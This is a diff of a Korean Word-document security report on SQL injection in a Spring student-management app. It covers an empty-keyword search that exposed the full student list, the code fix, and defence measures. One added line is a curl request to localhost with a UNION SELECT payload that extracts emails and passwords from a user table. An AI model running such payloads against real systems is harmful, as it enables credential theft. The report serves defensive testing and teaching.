+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>{"content":[],"pageable":{"pageNumber":0,"pageSize":10,"sort":{"empty":false,"sorted":true,"unsorted":false},"offset":0,"paged":true,"unpaged":false},"totalPages":0,"totalElements":0,"last":true,"size":10,"number":0,"sort":{"empty":false,"sorted":true,"unsorted":false},"numberOfElements":0,"first":true,"empty":true}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t># (수정 전 이슈, 현재는 해결됨) 검색어 파라미터 이름을 잘못 주면(name= 등) keyword 값이 비어있는 것으로 처리되어 전체 목록이 노출되는 문제가 있었음 → 검색어가 없으면 전체 조회로 폴백하지 않고 400 오류로 거부하도록 수정</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">curl -H "Authorization: Bearer $TOKEN" </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId12">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+            <w:color w:val="1155CC"/>
+            <w:sz w:val="18"/>
+            <w:szCs w:val="18"/>
+            <w:u w:val="single"/>
+          </w:rPr>
+          <w:t>http://localhost:8080/api/search/students?name=%25%27%20UNION%20SELECT%20id,email,password%20FROM%20user_info%20%23</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>(수정 후) {"statusCode":400,"message":"검색어를 입력하세요","timestamp":"2026-10-14 19:02:34"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:spacing w:before="180" w:after="90"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E5496"/>
+        </w:rPr>
+        <w:t xml:space="preserve">코드 수정 : StudentSearchService.searchStudents() </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>검색어(keyword/name/studentNumber)가 비어 있을 때 전체 목록을 반환하던 폴백을 제거하고, 400 오류로 거부</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>하도록 변경해야 합니다</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. 전체 목록 조회는 이미 /api/students(/paged)에서 관리자 전용으로 보호되고 있으므로, 검색 API가 이를 우회하는 통로가 되지 않도록 막</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>아야 합니다</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:spacing w:before="180" w:after="90"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E5496"/>
+        </w:rPr>
+        <w:t>[수정 전] 검색어 없음 → 전체 목록 반환</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>if (!StringUtils.hasText(keyword)) { return studentRepository.findAllWithDetails(pageable).map(StudentDTO.Response::fromEntity); } // 검색어가 비어 있으면 전체 목록 반환 (권한 정책 우회 가능)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:spacing w:before="180" w:after="90"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E5496"/>
+        </w:rPr>
+        <w:t>[수정 후] 검색어 없음 → 400 거부</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+          <w:left w:val="single" w:sz="18" w:space="6" w:color="C0C0C0"/>
+          <w:bottom w:val="single" w:sz="4" w:space="3" w:color="D9D9D9"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>if (!StringUtils.hasText(keyword)) { throw new BusinessException("검색어를 입력하세요", HttpStatus.BAD_REQUEST); } // 검색어가 비어 있으면 400 오류로 거부</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
       <w:r>
         <w:br w:type="page"/>
       </w:r>
@@ -3586,16 +4467,7 @@
         <w:t>심층 방어(Defense in Depth)</w:t>
       </w:r>
       <w:r>
-        <w:t>가 원칙이다. 가장 근본은 파라미터 바인딩이며, 나머지는 이를 보완하거나 피해를 줄이는 방어다. 아래는 현재 앱(Student_JWT)에 적용된 방어와, 일반적으로 적용해야 할 방어</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 대책을</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 함께 정리한 것이다.</w:t>
+        <w:t>가 원칙이다. 가장 근본은 파라미터 바인딩이며, 나머지는 이를 보완하거나 피해를 줄이는 방어다. 아래는 현재 앱(Student_JWT)에 적용된 방어와, 일반적으로 적용해야 할 방어 대책을 함께 정리한 것이다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3617,25 +4489,7 @@
         <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>쿼리의 구조(뼈대)는 코드로 고정하고, 사용자 입력은 자리</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>표시자에 "값"으로만 전달한다. 입력에 따옴표나 UNION이 들어와도 검색어로</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>만 취급되어 인젝션이 원천적으로 성립하지 않는다. 다른 모든 방어보다 우선한다.</w:t>
+        <w:t>쿼리의 구조(뼈대)는 코드로 고정하고, 사용자 입력은 자리 표시자에 "값"으로만 전달한다. 입력에 따옴표나 UNION이 들어와도 검색어로 만 취급되어 인젝션이 원천적으로 성립하지 않는다. 다른 모든 방어보다 우선한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3655,70 +4509,91 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>JPA 메서드 쿼리</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> — StudentRepository.findByNameContainingIgnoreCase(...) : 문자열 조립 자체가 없고 자동 바인딩</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>된다.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a4"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> — StudentRepository.findByNameContainingIgnoreCase(...) : 문자열 조립 자체가 없고 자동 바인딩 된다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>@Query 명명 파라미터</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> — :name 자리에 값으로 바인딩된다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>동적 쿼리가 꼭 필요할 때</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> — JdbcTemplate은 ? , EntityManager 네이티브 쿼리는 setParameter 를 사용한다.</w:t>
       </w:r>
     </w:p>
@@ -3895,24 +4770,7 @@
           <w:bCs/>
           <w:color w:val="2E5496"/>
         </w:rPr>
-        <w:t>8-2. 입력 검증 (화이트</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="2E5496"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="2E5496"/>
-        </w:rPr>
-        <w:t>리스트)</w:t>
+        <w:t>8-2. 입력 검증 (화이트 리스트)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3937,40 +4795,67 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>학번은 정규식(^[A-Z]+\d+$) 형태로 확인한 뒤 학번/이름 검색을 분기한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>요청 본문은 @Valid + DTO 제약(@NotBlank, @Size, @Email)으로 형식을 검증한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>경로변수 {id}는 Long 타입으로 선언되어 숫자만 허용된다(타입 강제도 일종의 검증).</w:t>
       </w:r>
     </w:p>
@@ -3998,59 +4883,68 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">어플리케이션에 접속하는 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>DB</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 계정은 자신이 쓰는 스키마/테이블에만 접근하도록 제한한다.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a4"/>
+        <w:t>어플리케이션에 접속하는 DB 계정은 자신이 쓰는 스키마/테이블에만 접근하도록 제한한다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">DROP, GRANT, FILE, 관리 계정 권한 등은 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>어플리케이션</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 계정에서 제거한다.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a4"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>DROP, GRANT, FILE, 관리 계정 권한 등은 어플리케이션 계정에서 제거한다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>information_schema 등 메타데이터 접근을 최소화하면 구조 탐색을 어렵게 만든다.</w:t>
       </w:r>
     </w:p>
@@ -4088,16 +4982,7 @@
         <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>상세한 SQL 오류 메시지나 스택트레이스가 응답에 노출되면, 공격자는 그 정보로 쿼리 구조를 알아내(오류 기반 인젝션) 공격을 정교화</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>한다. 사용자에게는 일반화된 오류만 보여준다.</w:t>
+        <w:t>상세한 SQL 오류 메시지나 스택트레이스가 응답에 노출되면, 공격자는 그 정보로 쿼리 구조를 알아내(오류 기반 인젝션) 공격을 정교화 한다. 사용자에게는 일반화된 오류만 보여준다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4126,24 +5011,7 @@
           <w:bCs/>
           <w:color w:val="2E5496"/>
         </w:rPr>
-        <w:t>8-5. 추가 방어 대책 (일반</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="2E5496"/>
-        </w:rPr>
-        <w:t>적인</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="2E5496"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 대책)</w:t>
+        <w:t>8-5. 추가 방어 대책 (일반적인 대책)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4151,102 +5019,96 @@
         <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>아래는 특정 앱에 국한되지 않고, SQL Injection 전반에 적용할 수 있는 방어</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 대책</w:t>
-      </w:r>
-      <w:r>
-        <w:t>들</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>입니</w:t>
-      </w:r>
-      <w:r>
-        <w:t>다.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a4"/>
+        <w:t>아래는 특정 앱에 국한되지 않고, SQL Injection 전반에 적용할 수 있는 방어 대책들입니다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>ORM/영속성 프레임워크 활용</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> — JPA/Hibernate 등은 기본이 파라미터 바인딩이라 인젝션 위험이 크게 줄어든다</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (단, 네이티브 쿼리 문자열 결합은 예외).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a4"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> — JPA/Hibernate 등은 기본이 파라미터 바인딩이라 인젝션 위험이 크게 줄어든다. (단, 네이티브 쿼리 문자열 결합은 예외).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>저장 프로시저(Stored Procedure)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> — 파라미터를 바인딩하는 형태로 작성할 경우 안전. 내부에서 동적 SQL을 문자열 결합하면 다시 취약</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>해진다.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a4"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> — 파라미터를 바인딩하는 형태로 작성할 경우 안전. 내부에서 동적 SQL을 문자열 결합하면 다시 취약 해진다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>WAF / IDS·IPS</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> — 웹 방화벽/침입탐지로 UNION, OR 1=1 같은 공격 패턴을 탐지·차단한다. </w:t>
       </w:r>
     </w:p>
@@ -4255,14 +5117,14 @@
         <w:spacing w:before="40" w:after="40" w:line="264" w:lineRule="auto"/>
         <w:ind w:left="1140"/>
         <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_heading=h.szq2792q26qt" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="1"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
@@ -4274,13 +5136,12 @@
         <w:spacing w:before="40" w:after="40" w:line="264" w:lineRule="auto"/>
         <w:ind w:left="1140"/>
         <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
@@ -4294,92 +5155,130 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:iCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:color w:val="000000"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
